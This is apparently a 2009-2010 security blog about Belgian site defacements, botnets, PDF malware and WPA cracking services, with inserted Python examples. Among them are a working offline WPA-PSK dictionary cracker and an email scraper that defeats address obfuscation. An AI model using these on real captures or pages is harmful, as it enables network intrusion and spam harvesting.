05/18/2010

bandits don't have to hack to get your info, they just go to prison and work

Radiant Info Systems has struck a deal with the Indian state of Andhra Pradesh to hire 200 inmates of a state jail to work on data entry and the processing and transmission of information.

"The idea is to ensure a good future for the educated convicts after they come out of jail," CN Gopinath Reddy, director general of prisons in Andhra Pradesh, told the BBC.

"With their experience of working in the BPO [business process outsourcing] in jail, any company will absorb them in future."

The outsourcing centre will handle banking information 24 hours a day using a shift system. Inmates will be paid US$2.20 a day, compared to US$0.33 a day for other work. (source)

And this is NO joke.

I would like to know whether inmates are handling my banking information, even if I don't do much, if any, online banking or transactions.

They say that if you pay peanuts you get monkeys, but here you get bandits.

05/17/2010

Deli, Mr Bricolage and a number of other shop and product websites hacked

From the zone-h archive for .be domains (date, notifier, zone-h flags, defaced URL, OS; "H" marks a homepage defacement and "M" a mass defacement, i.e. many sites on one compromised server):

2010/05/15  Und3rGr0unD W4rri0rZ        www.lapeyre.be/img/index.html        Linux  mirror
2010/05/15  Und3rGr0unD W4rri0rZ  M     game.candia.be/lang/index.html       Linux  mirror
2010/05/15  Und3rGr0unD W4rri0rZ  H M   www.club-promo.be                    Linux  mirror
2010/05/15  Und3rGr0unD W4rri0rZ  M     www.clubextra.be/lang/index.html     Linux  mirror
2010/05/15  Und3rGr0unD W4rri0rZ  M     www.coachbelgium.be/popup/inde...    Linux  mirror
2010/05/15  Und3rGr0unD W4rri0rZ  M     www.di.be/news/index.html            Linux  mirror
2010/05/15  Und3rGr0unD W4rri0rZ  M     www.lapeyre-game.be/images/ind...    Linux  mirror
2010/05/15  Und3rGr0unD W4rri0rZ  M     www.mbricolage.be/images/index...    Linux  mirror
2010/05/15  Und3rGr0unD W4rri0rZ  M     www.perledelait.be/images/inde...    Linux  mirror

http://www.zone-h.org/archive/filter=1/domain=be/page=1

What is "nice" is that so many high-value commercial sites sit on the same Linux server: one compromise of the shared host and all of them are defaced at once (that is what the M flag means).

04/14/2010

Shredding is not enough.... as Palin supporters found out

Palin is due to give a speech at a public university in June. The details of the contract itself became public because of sloppy document destruction by the organisers, so that opponents could find and publish the document.

"The students who found the contract document said they acted on a tip that documents were being shredded at the campus administration building on a day when staff members were supposed to be on furlough.

Alicia Lewis, 26, was one of the students who went to investigate. The building was locked and gated, but the students were able to retrieve piles of paperwork, including the contract document, from a nearby trash bin, Lewis said." (source)

I prefer confetti machines, and for the totally paranoid I have seen some in which the confetti comes out in a big ball, which makes it nearly impossible to find which pieces of confetti belong to which document, especially if you add some ordinary papers with a lot of text.

03/23/2010

Scrape 50,000+ email addresses from Google profiles

What you put online will be found online,

also by the email scrapers used by spambots,

so why make it so easy for them?

Search result counts for google.com/profiles combined with the big mail providers:

1,830 from google.com/profiles for @hotmail.com

3,620 from google.com/profiles for @yahoo.com

76,000 from google.com/profiles for @gmail.com

567 from google.com/profiles for @googlemail.com

1 - 100 of about 4,500 from google.com/profiles for @live.com
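As an added example (not from the original post), here is the sort of scraper a spambot runs over indexed profile pages. The page text is constructed for the example and the addresses in it are made up; it goes a little beyond the post in that it also undoes the common "[at]" / "(dot)" spellings, which shows why that trick does not protect an address once the page is indexed.

```python
import re
from collections import Counter

# Constructed sample of indexed profile-page text (made up for this example; none of
# these addresses is real or taken from the search results above).
SAMPLE_PAGES = """
Contact: alice.smith@gmail.com or alice [at] example [dot] org
Bob's page - mailto:bob_jones@hotmail.com - old: bob.jones(at)yahoo(dot)com
Carol: carol99 AT googlemail DOT com ; phone 555-0100
Duplicate: Alice.Smith@GMAIL.COM
Not an address: user@localhost, build 1.2.3@build
"""

# An address written out plainly.
PLAIN_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# The usual "anti-spam" spellings: "[at]", "(at)", " AT ", "[dot]", "(dot)", " DOT ".
# Bracketed forms match in any case; bare words only in upper case, so ordinary prose
# ("meet at noon") is left alone.
AT_RE = re.compile(r"\s*(?:[\[(]\s*[aA][tT]\s*[\])]|\s+AT\s+)\s*")
DOT_RE = re.compile(r"\s*(?:[\[(]\s*[dD][oO][tT]\s*[\])]|\s+DOT\s+)\s*")


def deobfuscate(text: str) -> str:
    """Turn 'name [at] host [dot] tld' back into 'name@host.tld' before matching."""
    return DOT_RE.sub(".", AT_RE.sub("@", text))


def extract_addresses(text: str) -> list:
    """Unique addresses found in the text, lower-cased (every scraper treats
    Alice@X and alice@x as the same mailbox, so they count once)."""
    return sorted({m.group(0).lower() for m in PLAIN_RE.finditer(deobfuscate(text))})


def count_by_domain(addresses: list) -> Counter:
    """Per-provider totals, the same breakdown as the search counts above."""
    return Counter(addr.rsplit("@", 1)[1] for addr in addresses)


if __name__ == "__main__":
    found = extract_addresses(SAMPLE_PAGES)
    for addr in found:
        print(addr)
    print(count_by_domain(found))
```

Only the last line of the sample survives unscraped, and only because "localhost" and "build" have no top-level domain; everything a human can read as an address, the regex reads too.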

03/09/2010

the insecurity numbers for 2010 say it all

The numbers say it all: In 2009, there were 148,000 zombie computers (spammers, botnets, etc.) created per day, over 2.6 million known malicious code threats at the start of 2009, and by the end of the year, nearly 1 million new ones were created. In other words, to quote the illustrious Stewart Baker: "[The security threat] is worse than we even thought."

http://www.circleid.com/posts/icann_and_cybersecurity_hot...

and some other numbers

Congress and other government agencies are under a cyber attack an average of 1.8 billion times a month, a number that has been growing exponentially since President Barack Obama took office.

 

In 2008, security events caused by vectors including worms, Trojan horses and spybots averaged 8 million hits per month. That number skyrocketed to 1.6 billion in 2009 and climbed to 1.8 billion this year, according to Senate Sergeant-at-Arms Terrance Gainer.

 

The Senate Security Operations Center alone receives 13.9 million of those attempts per day.
http://www.politico.com/news/stories/0310/33987.html

Just try to imagine those numbers. Even if only 1% of them were targeted, zero-day, very ingenious attacks, 1% of 13.9 million attempts a day is still far more than any team can probe and stop manually.

If you don't have a budget and you do have important data, you simply close down: limit access and block everything you can on a whitelist basis. No security product will stop all of this, all the time, everywhere.

03/08/2010

what is so disturbing about these hack attacks ?

On one side they are funny, and as such they are treated like the YouTube freaks:

a quick laugh and quickly forgotten.

But there is more to consider.

cadeaufabriek.be uses no HTTPS when you order (gift) cheques.

The official organisation that mediates between customers and the energy companies uses no HTTPS on the forms in which you have to fill in all kinds of personal data.

The login process for your CV on the other site also has no HTTPS protection.

And there are other sites (official ones too) with no, very scarce or bad use of SSL encryption in their data handling and protection. There are no norms in Belgium about that.
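An added example, not from the original post: a check for the problem described above. Given a page's URL and its HTML, it lists every form, resolves where the form really submits to (a relative action on an http:// page posts in clear, and an https:// page can still post to http://), and flags forms with fields that look like personal or secret data. The sample page, its URL and the list of "sensitive" field names are assumptions made for the example; they are not taken from any of the sites named above.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Field names that suggest personal or secret data. An assumption for this example,
# not a standard list; extend it for the forms you audit.
SENSITIVE_HINTS = ("pass", "pwd", "iban", "card", "rijksregister", "national", "birth", "ssn")


class FormCollector(HTMLParser):
    """Collects each <form>'s action and method and the named fields inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),
                             "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            if a.get("name"):
                self._current["fields"].append((a["name"], (a.get("type") or "text").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_forms(page_url: str, html: str) -> list:
    """One finding per form: where it really submits to (relative actions inherit the
    page's own scheme, so a form on an http:// page with action="/send" posts in clear),
    whether that is TLS, and which fields look sensitive."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        target = urljoin(page_url, form["action"])
        sensitive = [name for name, ftype in form["fields"]
                     if ftype == "password" or any(h in name.lower() for h in SENSITIVE_HINTS)]
        findings.append({"target": target,
                         "method": form["method"],
                         "over_tls": urlsplit(target).scheme == "https",
                         "sensitive_fields": sensitive})
    return findings


def cleartext_sensitive_forms(page_url: str, html: str) -> list:
    """The findings that matter: sensitive fields submitted without TLS."""
    return [f for f in audit_forms(page_url, html) if f["sensitive_fields"] and not f["over_tls"]]


# Constructed page (not one of the sites named above): a complaint form on plain http.
SAMPLE_URL = "http://www.example.be/klacht"
SAMPLE_HTML = """
<html><body>
<form action="/klacht/verzenden" method="post">
  <input name="naam"> <input name="rijksregisternummer"> <input name="iban">
  <input type="submit" value="Verzenden">
</form>
<form action="https://secure.example.be/login" method="POST">
  <input name="user"> <input type="password" name="pass">
</form>
<form action="//www.example.be/search">
  <input name="q">
</form>
</body></html>
"""

if __name__ == "__main__":
    for f in audit_forms(SAMPLE_URL, SAMPLE_HTML):
        print("OK  " if f["over_tls"] else "WARN", f["method"].upper(), f["target"], f["sensitive_fields"])
```

The check only looks at the form's target; a page served over http:// can also have its form rewritten on the way to the browser, so the page itself has to be on HTTPS as well, not just the action.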

And on top of it all, these sites were hacked.

There is no impact report or audit, there is no information for the possible victims about whether data has been leaked, there is only the wild wild west. Use at your own risk. Because there are no norms in Belgium about that. And as long as nobody files a complaint with the FCCU or the Privacy Commission there is no problem.

As long as we don't talk about it, right?

Because people could start having doubts and we would have to invest in security, and we can't have that.

And that is all for today, see you tomorrow.

Microsoft calls for ISPs to block infected PCs

Internet service providers like Belgacom and Telenet should block PCs that appear to be infected, as detected by signature-based antivirus checks (not heuristic or advanced ones, which would produce too many false positives).

The only problem with this is that you will need a whitelist of organisations, enterprises and infrastructure that can't be blocked individually but must go through an alert system instead. In fact this is the beginning of a network-wide alerting system, because every such network would have to set up a process in which clean-up requests from the ISP are taken care of quickly. This would be useful for the CERT and during a crisis. The reason they would have to do it is that otherwise they couldn't be whitelisted (they will need to adopt a process and fill in forms). The reason they would have to clean up is that they would otherwise lose their whitelisting and be automatically blocked if one of the PCs on their network is infected again. I think the business value of securing your network will be so evident (imagine a day without mail or internet) that no one will doubt for a second to secure the computers and put the necessary limits and controls in place.

For the ISPs it is also quite interesting because it will take away some of their responsibility. They can say: "you are blocked because you are infected and you should clean up your computer before you can reconnect. If you don't know which antivirus to use, here are links to several free ones for home and/or business use. This is the virus, and here are some links to help if you can't get it off your systems." The banks and financial services will also find something interesting in it, because they will have fewer infected clients attacking their networks and trying to steal money from their customers.

If customers get fed up with a continuous stream of infections they don't seem able to handle (once hacked, always attacked), ISPs can offer a clean pipe or protected zone (mail, banking and another 100 selected trusted services, if that is all you do on the web or all you want your kids or others to do on the web). The trusted zones could also be used when a massive worldwide new attack makes it difficult to use the web at all.

This is the quote:

"If the access provider just made sure you're not carrying any disease and you're not going to infect the community we'll let you connect with no further ado. But if you are infected with something we recognize and have a signature for, let's clean you up and allow you to connect.

I wondered what is the rational basis for doing this to consumers and I started thinking about smoking. People smoked for the longest time even after we knew it causes many types of cancer, heart disease. Society said you have a right to smoke. Even though you're going to add cost to the health care system that we're all going to have to pay for, if you're going to risk lung cancer that's your right. Then the EPA came out with the secondhand smoke report and suddenly smoking was banned in a lot of public places. The philosophy is simple--you may have the right to risk your own life and risk disease, but you don't have a right to sicken the person next to you. So when we started in Internet security we said to consumers, run antivirus, update your software, and back up your data, and many people didn't. The problem with botnets is you're not just risking yourself any more, you're risking everybody else in the community. It's just like smoking."

http://news.cnet.com/8301-27080_3-10462649-245.html


why one should put passwords on important files, or encrypt them

The PDF format is becoming more and more a vehicle for malware diffusion and hacking. Didier Stevens (a Belgian, by the way) has shown once again that you can do whatever you want through a manipulated PDF and the reader that opens it, by using the format's features rather than bugs.

He has made a proof of concept in which files are stolen from the local computer that opened an infected, hacked PDF file.
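An added example, not Didier Stevens' code or Adobe's: the triage check to run on a PDF before opening it, in the spirit of his pdfid tool. It counts the names that give a PDF behaviour (/OpenAction, /AA, /Launch, /JavaScript, /JS, embedded files and so on), undoes the hex-escaping that hides them from a plain grep, and also looks inside Flate-compressed streams. The sample file is constructed in the code and is not a real malicious document; which names to treat as risky is this example's own choice.

```python
import re
import zlib
from collections import Counter

# Names that give a PDF "behaviour": actions, scripts, embedded files. Which names to
# treat as risky is an assumption of this example (pdfid uses a similar list).
RISKY = {"JavaScript", "JS", "Launch", "OpenAction", "AA", "EmbeddedFile",
         "RichMedia", "SubmitForm", "ImportData", "GoToR", "URI", "XFA", "AcroForm"}
ACTIVE = ("JavaScript", "JS", "Launch", "OpenAction", "AA", "RichMedia", "XFA")

NAME_RE = re.compile(rb"/([A-Za-z0-9#_.\-]+)")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
HEX_RE = re.compile(r"#([0-9A-Fa-f]{2})")


def decode_name(raw: bytes) -> str:
    """PDF names may hex-escape any byte, so /J#61vaScript is /JavaScript; undo that."""
    return HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), raw.decode("latin-1"))


def _count_names(data: bytes, counts: Counter) -> None:
    for m in NAME_RE.finditer(data):
        name = decode_name(m.group(1))
        if name in RISKY:
            counts[name] += 1


def scan_pdf(data: bytes) -> Counter:
    """Count risky names in the file's object syntax and inside Flate-compressed streams."""
    counts = Counter()
    # Scan the structure with stream bodies blanked out, so binary stream data cannot
    # produce accidental matches ...
    _count_names(STREAM_RE.sub(b"stream\nendstream", data), counts)
    # ... then inflate each stream and scan its contents, where object streams hide names.
    for m in STREAM_RE.finditer(data):
        try:
            _count_names(zlib.decompress(m.group(1)), counts)
        except zlib.error:
            continue  # not Flate-encoded (or damaged); left alone, as pdfid does
    return counts


def has_active_content(counts: Counter) -> bool:
    """True when the file can run something on open, not merely carry an attachment."""
    return any(counts[name] for name in ACTIVE)


def build_sample_pdf() -> bytes:
    """Constructed sample, not a real malicious file: the catalog's /OpenAction and the
    page's /AA both point at a /Launch action, and a compressed stream carries a
    hex-escaped /JavaScript name that a plain grep would miss."""
    hidden = zlib.compress(b"<< /S /J#61vaScript /JS (app.alert(1)) >>")
    head = (b"%PDF-1.4\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
            b"3 0 obj << /Type /Page /Parent 2 0 R /AA << /O 4 0 R >> >> endobj\n"
            b"4 0 obj << /S /Launch /F (cmd.exe) >> endobj\n"
            b"5 0 obj << /Length " + str(len(hidden)).encode() + b" /Filter /FlateDecode >>\nstream\n")
    return head + hidden + b"\nendstream\nendobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    result = scan_pdf(build_sample_pdf())
    print(dict(result), "active content:", has_active_content(result))
```

A count above zero is not proof of malice (forms and bookmarks use some of these names legitimately), but a document from a stranger that wants to /Launch something or run /JavaScript on open has no business being opened in a full-featured reader.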

Encryption, or some form of identification before you get access to important files, should become the norm.

It is just a shame that Adobe is killing the PDF format this way, but let no one blame Microsoft afterwards when people look at its formats again for safe standards, because Adobe did this all by itself.

The best thing Adobe can do is give us back a stupid, read-only, no-script, secure Adobe Reader and PDF format. Like in the good old days. (In the meantime you can at least switch JavaScript off in the reader's preferences.)

An interesting read

03/05/2010

online cracking of your wireless WPA connection

First they discovered wireless and forgot all about security: who needs that anyway, the internet was made without security, so why would the wireless protocol need any?

After a few incidents and questions the industry, as they call themselves, got together and decided to write some security protocols to have at least some security, but not too much and not too heavy.

This WEP was easily broken, so they had to make another one, WPA, that would be much harder to break (meanwhile people are still using no security, or WEP), and there is even WPA2 now. WPA and WPA2 are not broken the way WEP was, but in the common pre-shared-key setup the whole network hangs on one passphrase, and once an attacker has captured the four-way handshake between a client and the access point that passphrase can be guessed offline, one dictionary word at a time, with no further contact with the network. That is exactly the work the services below sell.

But as with any security it can be broken, and what can be broken can be sold, and what can be sold can become a criminal business.

So one of the new business models from the cloud is that you can ask a collection of servers and databases to break passwords and encryption. Thousands of computers do it for you and you just pay for the result. Isn't that fantastic: the power of the cloud for criminals, a criminal cloud. Imagine what the GRID or Internet2 could bring to organised online crime.

 

At first there was no security when they started with wireless. Simply forgotten; of course everything first had to be launched as quickly as possible.

Then they finally got together to draw up a number of security standards for the different kinds of wireless connections (protocols).

 http://ph33rbot.com/wpa-password-cracker/

http://www.wpacracker.com/

And it doesn't even have to be computers: because of the enormous computing power of game consoles, those are the favourite tool for setting up farms of boxes that crack passwords and encryption.
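An added example, not code from the services linked above: what that "cloud" or console farm actually computes per guess. WPA/WPA2-PSK derives the pairwise master key from the passphrase and the SSID with PBKDF2-HMAC-SHA1 (4096 rounds), expands it with the 802.11i PRF over the MAC addresses and nonces of the four-way handshake, and checks the guess against the MIC on the captured EAPOL-Key frame, all of it offline. The MACs, nonces and EAPOL bytes here are constructed stand-ins for a sniffed handshake, and the network name and passphrase are made up.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    Those 4096 rounds are the whole cost of testing one guess, they depend only on
    (passphrase, SSID), and each guess is independent: ideal work to farm out to a cloud
    or to precompute per common SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512 over the two MACs and the two handshake nonces; the first 16 bytes
    of the result are the KCK that authenticates the EAPOL-Key frames."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                            hashlib.sha1).digest() for i in range(4))
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (AES key descriptor): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def make_capture(ssid: str, passphrase: str) -> dict:
    """Constructed stand-in for a sniffed four-way handshake (no real traffic involved):
    fixed MACs, nonces and EAPOL-Key bytes, with the MIC computed exactly as the client
    would. The frame is stored with its MIC field already zeroed, as a cracker would do."""
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    eapol = b"\x02\x03\x00\x75\x02\x01\x0a\x00\x10" + b"\x00" * 8 + snonce + b"\x00" * 48
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def crack(capture: dict, wordlist):
    """Offline dictionary attack: derive PMK -> KCK for each guess and compare the MIC.
    Nothing here talks to the network; the handshake alone is enough."""
    for guess in wordlist:
        pmk = pmk_from_passphrase(guess, capture["ssid"])
        kck = ptk_from_pmk(pmk, capture["aa"], capture["spa"],
                           capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return guess
    return None


if __name__ == "__main__":
    cap = make_capture("HomeNetwork", "sunshine2010")
    print(crack(cap, ["password", "12345678", "letmein", "sunshine2010"]))
```

Because the expensive step depends only on (passphrase, SSID), a cracking service precomputes it once per common default SSID and then checks a captured handshake in seconds; a non-default SSID and a long random passphrase push the work back onto the attacker, and WPA2-Enterprise (per-user credentials via 802.1X) removes the shared secret altogether.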

What would that mean for an attack on the eID, to get hold of your national register number, the most unsafe combination of digits ever assembled as a unique identifier?

03/03/2010

how to clean up millions of computers at once

This week we have about ten to twenty million personal computers that were part of botnets and that, as zombies, have now lost control and contact with their criminal masters and their infrastructure.

There is no way we can clean them up manually or individually.

But we have captured the infrastructure and the botnet control scripts or domains that were used.

The idea is the following.

All those infected computers should receive a security clean-up and update. Otherwise it changes nothing in the threat landscape, because those computers will be re-hacked and re-enrolled in a botnet again and again. Probably the other bot herders are already trying to reinfect or take over those computers.

So let's use the botnet infrastructure, commands and domains to send a message to those users that they were infected by a botnet and that they should install antivirus software.

The problem is how you do that while we are telling everyone not to click on security alerts that pop up on their screen, because they could be clicking on fake security software that is in fact malware.

Maybe the Conficker Working Group can be used. It works through the CERTs, which distribute the IP addresses through the ISPs, so at least the network admins will be informed and can clean up these machines or contact the users. For the other individuals one could make an online check page or an automatic download directly from their ISP and announce that they have to install the necessary software (without adding other things, so that there is no privacy or other outcry over what is essentially a security clean-up operation).

It will also prove that the Conficker Working Group is not so much an overhyped exercise as the setting in motion of an international security cooperation and coordination group that can be essential in the tracking, arrest and clean-up of those international botnets. As long as we have a minimal state in cyberspace, we should have maximum cooperation between the private partners, at least against organised cybercrime and botnets.

I think it is one of the biggest challenges before us: as the tracking, arrest and dismantling of botnets becomes easier, the clean-up operation afterwards will become more challenging and important.

another botnet, Mariposa, bites the dust

The Spanish police have arrested another gang of botnet leaders, those behind Mariposa. They had more than 800,000 stolen user credentials and controlled 13 million infected computers (zombies) in 190 countries, many of them part of important confidential networks (perimeter defence?).

If you want to check whether you or your network had any connection to it, search your logs for connections to the IP addresses and links mentioned in this detailed analysis:

http://defintel.com/docs/Mariposa_Analysis.pdf
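An added example, not from the analysis or the original post: how to run such a list of indicators over your own logs. It pulls every IPv4 address and hostname out of each line, whatever the log format, and matches them against the indicator sets; a host that merely resolves an IOC domain or sends one packet to a C&C address is enough to pull it off the network. The indicator values are placeholders (documentation ranges and reserved names), not the Mariposa addresses, and the log lines are constructed.

```python
import ipaddress
import re

# Placeholder indicators (RFC 5737 documentation ranges and reserved example names).
# These are NOT the addresses from the Mariposa analysis: copy the real IPs and domains
# out of the PDF linked above into these sets before running this against your logs.
IOC_IPS = {"198.51.100.23", "203.0.113.77"}
IOC_NETS = [ipaddress.ip_network("192.0.2.0/24")]
IOC_DOMAINS = {"butterfly.example", "c2.example.net"}

# The address range you consider your own. An assumption of this example.
INTERNAL = ipaddress.ip_network("10.0.0.0/8")

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)

# Constructed sample lines: iptables-style firewall logging and squid-style proxy access
# log, mixed, the way they arrive at a central syslog. Not real traffic.
SAMPLE_LOGS = """
Mar  3 10:01:12 fw kernel: IN=eth1 OUT=eth0 SRC=10.0.0.15 DST=198.51.100.23 PROTO=TCP DPT=3074
Mar  3 10:01:40 fw kernel: IN=eth1 OUT=eth0 SRC=10.0.0.22 DST=93.184.216.34 PROTO=TCP DPT=443
1267610512.123    312 10.0.0.15 TCP_MISS/200 512 GET http://update.butterfly.example/gate.php - DIRECT/192.0.2.15 text/html
1267610601.456    120 10.0.0.31 TCP_MISS/200 1024 GET http://www.example.com/ - DIRECT/93.184.216.34 text/html
Mar  3 10:05:03 fw kernel: IN=eth1 OUT=eth0 SRC=10.0.0.40 DST=192.0.2.200 PROTO=UDP DPT=53
"""


def match_line(line: str) -> list:
    """Every indicator the line touches, as (kind, value) pairs, whatever the log format:
    pull out all IPv4 addresses and hostnames and test each one."""
    hits = []
    for ip in IPV4_RE.findall(line):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue
        if ip in IOC_IPS or any(addr in net for net in IOC_NETS):
            hits.append(("ip", ip))
    for host in HOST_RE.findall(line):
        h = host.lower()
        if h in IOC_DOMAINS or any(h.endswith("." + d) for d in IOC_DOMAINS):
            hits.append(("domain", h))
    return hits


def scan_logs(text: str) -> list:
    """(line number, hits) for each line that touched an indicator."""
    results = []
    for n, line in enumerate(text.strip().splitlines(), 1):
        hits = match_line(line)
        if hits:
            results.append((n, hits))
    return results


def suspect_hosts(text: str) -> set:
    """Internal addresses seen on matching lines: the machines to pull off the network."""
    lines = text.strip().splitlines()
    hosts = set()
    for n, _ in scan_logs(text):
        for ip in IPV4_RE.findall(lines[n - 1]):
            try:
                if ipaddress.ip_address(ip) in INTERNAL:
                    hosts.add(ip)
            except ValueError:
                pass
    return hosts


if __name__ == "__main__":
    for n, hits in scan_logs(SAMPLE_LOGS):
        print(f"line {n}: {hits}")
    print("suspect internal hosts:", sorted(suspect_hosts(SAMPLE_LOGS)))
```

Matching whole subdomains (anything ending in ".butterfly.example") matters because bots rotate hostnames under one registered domain; matching whole netblocks matters for the same reason on the IP side. Treat the DNS resolver's query log the same way: a lookup of a C&C name is a hit even when the connection itself never shows up.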

Make my day, take a botnet away

everyday one :)

Will someone clean this mess up or will those millions of computers stay vulnerable and infected, even if their control and command centers are gone ?




08/28/2009

consumers and online banking

The Belgian consumer organisation Test Aankoop says that banks should stay responsible for all problems with online banking and shouldn't expect users to be security experts who keep everything up to date, nor punish them if they get defrauded because their computer wasn't updated.

I agree with that. But there is no fundamental human right to have access to any online service if your computer is insecure and could pose a threat to the service you want to use (or to yourself, but that would reflect on the company).

So banks and other online services have the right to refuse access to computers that don't have an updated antivirus, security updates or a firewall installed. And banks or other services could decide that, to make it easier to secure the connection, their users should use pre-installed software or special dedicated lines. They should also be able to set whatever norm they want for the login and authorisation (or whatever combination of authentication methods).

If they are to pay for any damage, they have the right to limit the risk as much as they want.

08/19/2009

shared hosting disaster : 280 .be domains defaced


Stijn (ex-Ubizen) still thinks that the US has no IT security

source (Dutch)

Maybe it is because he has sold/left the IT security business (to Verizon) that he has lost touch. He is now manager at a local organisation for the 'reconversion of the local economy'.

He says that the Europeans are very good at securing their business because they always want to secure it, while the Americans are very bad at securing their business because they only want to insure it. Securing their business, in his opinion, is only an option if it costs less than the insurance.

Secondly, he still thinks that in the US it is only the market that decides whether networks or data get secured and that there are no laws and regulations over there.

You know, we Europeans are so smart and confident and intelligent that those things don't happen to us. It is only those stupid Americans who get hacked. That is a bit the tone of the unresearched article in a national newspaper around here.

I didn't know whether to laugh or cry at these opinions, but:

* Europe has no ID-theft or breach-notification laws, or a bunch of other privacy and IT security laws that the US, or a great number of US states, already have. They are not perfect, but at least they are something, and something is better than nothing.

* Europe has no global public/private partnership and vision about the security of its networks and assets. The US has a whole bunch of programmes covering the whole industrial and economic spectrum and government. These programmes are all setting up contact networks, processes and guidelines. That they aren't perfect and aren't always used as they should be is normal, but at least they exist.

* There is no Europe, just as there is no US. Many of the American laws mentioned are state laws, not federal, but the advantage is that you don't have to wait until the most resistant state finally agrees to secure its networks and assets before you begin securing your own. The situation in Europe is much different from how it is presented. Credit card use doesn't have the same safety precautions throughout Europe; in some countries you don't need a PIN code to use some credit cards.

* And if we are so secure, then why do we have a site, be-hacked, in which hacked online shops pop up from time to time? It is not because the media doesn't talk about it that the IT infrastructure in Belgium (and Europe) isn't attacked and hacked. But as there is no obligation to tell, as the press doesn't want to give it much attention and no parliament or government institution has the right to ask questions, we still think that we live in a safe fata morgana in the middle of a desert. And as long as we think we live in a fata morgana, with water and greenery and shade, we don't have to think about the desert.

We are in a desert.

Here in Europe.

In the US they are planting trees and building pipelines and fortresses.

We are still discussing whether we have to do something, and what.

If you believe the article by Stijn, not much.

08/18/2009

destroying your emails but using your own phone (how secure?)

In the investigation into who leaked to the ministers the decision the highest court of Belgium was about to take in the Fortis case, there is something funny. A detail, of course.

It seems that some of the leakers destroyed the emails on their computers and that there is a problem with material evidence (forensics and ISP?).

But also in the three investigations into the three illegal leaks of this information (which was already responsible for the fall of our government last year), it is funny to read that all the persons involved were using their own phones. That easy. Person X phoned person Y. How do you know? He used his own phone number.

He didn't go to a public phone booth in a railway station, for example, or use someone else's phone? They are doing something illegal and they know it, and they still use their own phones? These are people who have been working at the justice department for years and who should know that telephone logs are one of the easiest things to use.

08/17/2009

water leakage in archives and onlooking workers

It was a strange sight on TV. You saw water falling from the ceiling in the archive of the central court office in Brussels. You saw some firemen trying to keep the ceiling from coming down by letting the water through some holes onto the paper files beneath it.

Someone was explaining on television that they would have a look afterwards at what the damage was and how the files could be rescued. Meanwhile the water was still falling on those paper files, without any plastic protection.

I am not making this up.

They didn't take the files away. Damage control. No security reflex. No reflex to protect what was to be protected. It could be that the firemen were afraid that the whole ceiling would come down (somewhere above it a water pipe had burst). But somebody could have taken 10 minutes to put the files in plastic boxes and in safety.

These were the files of the investigation into the possible corruption of one of our most important judges, which is making headlines nowadays (and pages and pages of comments and new developments each day).

08/14/2009

Obama may be shot - like Kennedy

One of the things I remember from the several books I have read about the Kennedys (still, what an inspirational president, even if he didn't change as much as he should have) is that in the months leading up to his assassination there was a whole campaign in the South about how dangerous and unpatriotic he was and how he had betrayed his country, and so on.

What the conservatives in the US are doing now in their astonishingly brutal and radical campaign against the necessary health care reforms is of the same kind. They tell every nut (and be sure there are enough 'New World Order', survivalist, white pride hooligans and other nuts around there) that it would be OK to kill or shoot this president because he is a president, in fact a Nazi, he is not one of them, he is not even an American (the birth certificate nuts) and according to some he may even be ready to declare a state of emergency (and take away your guns). In fact, in the US nuts have guns and they use them. They train to use them. And not small guns to protect themselves (as they say), no, real guns you can go to war with.

It should come as no surprise that the intensity of 'assassination' chatter on the internet between those armed nuts is increasing. I think every security professional working for and with the president is going nuts now and working overtime. And each time the president wants to go out to campaign (because he will have to campaign to get this fundamental reform through now; it won't be politically possible later), all those physical security professionals (bodyguards, secret agents and the rest of them) know that they will need to be at their best, 1000%. Because if this president gets shot, I am not sure the 'black pride' nuts will behave, and if there is as much doubt about the security precautions of the security service as there was about the victory of George Bush in 2000, you will have more 'conspiracy industry' writers than about 9/11.

But there needn't be a real conspiracy. There is already a conspiracy by the conservatives to create an atmosphere in which a normal and open democratic debate based on facts is impossible, and in which your opponent is described as the biggest threat to anything America stands for since the Second World War and Stalin. He will even kill your old mother and father.

